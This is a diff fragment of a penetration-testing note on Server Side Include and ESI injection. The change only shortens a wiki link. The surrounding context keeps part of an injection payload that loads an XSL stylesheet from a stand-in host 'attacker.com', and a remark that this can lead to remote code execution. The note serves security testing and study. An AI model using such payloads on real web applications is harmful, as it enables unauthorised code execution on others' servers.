jsclatos223/HackAllTheThings/docs/Web Applications testing/Attacks/Server Side Include.md

 stylesheet="http://attacker.com/transformation.xsl" />
 ```

 > There is also a possibility that the ESI Injection might lead to Remote Code Execution when it has support for XSLT.
-Check [[Web Applications testing/Attacks/XSLT Engines]]
+Check [[XSLT Engines]]